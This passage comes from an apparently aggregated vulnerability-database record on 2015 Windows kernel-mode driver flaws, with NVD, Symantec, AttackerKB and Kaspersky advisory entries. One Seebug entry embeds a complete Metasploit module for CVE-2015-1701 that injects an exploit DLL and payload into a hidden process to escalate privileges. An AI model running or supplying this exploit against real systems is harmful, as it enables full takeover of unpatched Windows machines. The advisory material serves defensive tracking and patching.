"exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1679"], "modified": "2019-05-13T20:30:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1679", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1676, CVE-2015-1677, CVE-2015-1679, and CVE-2015-1680.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1678", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1678"], "modified": "2019-05-13T20:24:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1678", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1678", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:01", "description": "Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka \"Win32k Elevation of Privilege Vulnerability.\"", "edition": 6, "cvss3": {}, "published": "2015-04-21T10:59:00", "title": "CVE-2015-1701", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1701"], "modified": "2020-05-14T21:15:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_2003_server:*", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1701", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1701", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_2003_server:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*"]}], "attackerkb": [{"lastseen": "2020-11-23T18:08:26", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "description": "Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka \u201cWin32k Elevation of Privilege Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 23, 2020 6:03pm UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-30T00:00:00", "published": "2015-04-21T00:00:00", "id": "AKB:4D68F6C9-C824-4E40-8B94-3BEB1311F432", "href": "https://attackerkb.com/topics/gsWNaBaFfD/cve-2015-1701", "type": "attackerkb", "title": "CVE-2015-1701", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-12T14:14:48", "bulletinFamily": "software", "cvelist": ["CVE-2015-1701"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will result in the complete compromise of affected computers.\n\n### Technologies Affected\n\n * Microsoft Windows \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-04-18T00:00:00", "published": "2015-04-18T00:00:00", "id": "SMNTC-74245", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74245", "type": "symantec", "title": "Microsoft Windows CVE-2015-1701 Local Privilege Escalation Vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-11T18:48:57", "bulletinFamily": "software", "cvelist": ["CVE-2015-1676"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74483", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74483", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1676 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-12T02:29:29", "bulletinFamily": "software", "cvelist": ["CVE-2015-1680"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74497", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74497", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1680 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:42:35", "bulletinFamily": "software", "cvelist": ["CVE-2015-1677"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74494", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74494", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1677 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:39:21", "bulletinFamily": "software", "cvelist": ["CVE-2015-1679"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74496", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74496", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1679 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:42:50", "bulletinFamily": "software", "cvelist": ["CVE-2015-1678"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74495", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74495", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1678 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T11:58:01", "description": "No description provided by source.", "published": "2017-04-25T00:00:00", "type": "seebug", "title": "MS15-051 Win32k ClientCopyImage Elevation of Privilege Vulnerability (CVE-2015-1701)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2017-04-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93039", "id": "SSV:93039", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\nrequire 'rex'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows ClientCopyImage Win32k Exploit',\r\n 'Description' => %q{\r\n This module exploits improper object handling in the win32k.sys kernel mode driver.\r\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\r\n Windows 2008 R2 SP1 x64.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Unknown', # vulnerability discovery and exploit in the wild\r\n 'hfirefox', # Code released on github\r\n 'OJ Reeves', # msf module\r\n 'Spencer McIntyre' # msf module\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' => [\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'Payload' => {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'References' => [\r\n ['CVE', '2015-1701'],\r\n ['MSB', 'MS15-051'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],\r\n ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],\r\n ['URL', 'https://technet.microsoft.com/library/security/MS15-051']\r\n ],\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def check\r\n # Windows XP SP3 (32-bit) 5.1.2600.6514 (Works)\r\n # Windows Server 2003 Standard SP2 (32-bit) 5.2.3790.5445 (Works)\r\n # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)\r\n # Windows 7 SP1 (64-bit) 6.1.7601.17514 (Works)\r\n # Windows 7 SP1 (64-bit) 6.1.7601.17535 (Works)\r\n # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)\r\n # Windows 7 SP1 (32-bit) 6.1.7601.18388 (Works)\r\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)\r\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.18105 (Works)\r\n\r\n if sysinfo['OS'] !~ /windows/i\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /(wow|x)64/i\r\n arch = ARCH_X64\r\n elsif sysinfo['Architecture'] =~ /x86/i\r\n arch = ARCH_X86\r\n end\r\n\r\n file_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys'\r\n major, minor, build, revision, branch = file_version(file_path)\r\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\r\n\r\n return Exploit::CheckCode::Safe if build > 7601\r\n\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n\r\n check_result = check\r\n if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown\r\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\r\n end\r\n\r\n if sysinfo['Architecture'] == ARCH_X64\r\n if session.arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\r\n end\r\n\r\n if target.arch.first == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\r\n end\r\n elsif target.arch.first == ARCH_X64\r\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\r\n end\r\n\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Meterpreter::RequestError\r\n # Reader Sandbox won't allow to create a new process:\r\n # stdapi_sys_process_execute: Operation failed: Access is denied.\r\n print_status('Operation failed. Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n if target.arch.first == ARCH_X86\r\n dll_file_name = 'cve-2015-1701.x86.dll'\r\n else\r\n dll_file_name = 'cve-2015-1701.x64.dll'\r\n end\r\n\r\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93039", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2020-09-02T11:57:15", "bulletinFamily": "info", "cvelist": ["CVE-2015-1684", "CVE-2015-1676", "CVE-2015-1677", "CVE-2015-1686", "CVE-2015-1679", "CVE-2015-1681", "CVE-2015-1678", "CVE-2015-1673", "CVE-2015-1701", "CVE-2015-1716", "CVE-2015-1674", "CVE-2015-1680", "CVE-2015-1702", "CVE-2015-1672"], "description": "### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft products. Malicious users can exploit these vulnerabilities to bypass security restrictions, cause denial of service, gain privileges or obtain sensitive information.\n\n### *Affected products*:\nWindows Server 2003 x86, x64, Itanium Service Pack 2 \nWindows Vista x86, x64 Service Pack 2 \nWindows Server 2008 x86, x64, Itanium Service Pack 2 \nWindows 7 x86, x64 Service Pack 1 \nWindows Server 2008 R2 x64, Itanium Service Pack 1 \nWindows 8, 8.1 x86, x64 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows RT \nWindows RT 8.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Microsoft bulletin](<https://technet.microsoft.com/en-us/library/security/ms15-055>) \n[CVE-2015-1686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1686>) \n[CVE-2015-1684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1684>) \n[CVE-2015-1702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1702>) \n[CVE-2015-1679](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1679>) \n[CVE-2015-1678](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1678>) \n[CVE-2015-1680](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1680>) \n[CVE-2015-1672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1672>) \n[CVE-2015-1701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1701>) \n[CVE-2015-1677](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1677>) \n[CVE-2015-1676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1676>) \n[CVE-2015-1681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1681>) \n[CVE-2015-1674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1674>) \n[CVE-2015-1673](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1673>) \n[CVE-2015-1716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1716>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2015-1686](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1686>)4.3Warning \n[CVE-2015-1684](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1684>)4.3Warning \n[CVE-2015-1702](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1702>)6.9High \n[CVE-2015-1679](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1679>)2.1Warning \n[CVE-2015-1678](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1678>)2.1Warning \n[CVE-2015-1680](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1680>)2.1Warning \n[CVE-2015-1672](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1672>)5.0Critical 